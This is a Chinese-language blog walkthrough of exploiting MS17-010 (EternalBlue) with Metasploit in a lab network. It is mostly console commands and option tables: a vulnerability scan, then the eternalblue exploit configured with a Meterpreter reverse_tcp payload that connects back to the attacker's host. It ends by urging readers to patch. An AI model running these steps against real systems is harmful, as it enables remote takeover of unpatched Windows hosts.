主机工程师每天的一项日常工作就是给系统打各种补丁,我之前一直不以为然,认为这些补丁都可有可无。最近实践了下大名鼎鼎的ms17-010永恒之蓝,让我改变了这一想法。
主机:kali 192.168.106.242
靶机:Windows Server 2008 R2 192.168.106.240
永恒之蓝是以前玩剩下的了,现在Metasploit里面已经集成了17-010漏洞,渗透测试更加方便与正式化,内网中用17-010去测一测会发现意外惊喜。
搜索到了4个相关的模块:
- auxiliary/admin/smb/ms17_010_command
- auxiliary/scanner/smb/smb_ms17_010
- exploit/windows/smb/ms17_010_eternalblue
- exploit/windows/smb/ms17_010_psexec
先使用auxiliary/scanner/smb/smb_ms17_010扫描可能含有ms17-010漏洞的服务器。
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/smb_ms17_010) >
可以看到靶机的ms17-010漏洞被扫描出来了。
使用exploit/windows/smb/ms17_010_eternalblue攻击,这里设置meterpreter的payload。
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.106.240
rhosts => 192.168.106.240
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.106.242
lhost => 192.168.106.242
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.106.240 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.106.242 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
exploit成功,接下来就可以为所欲为了~~
所以说补丁还是得勤打,特别是永恒之蓝这种级别的漏洞,毕竟各大厂商不是吃白饭的。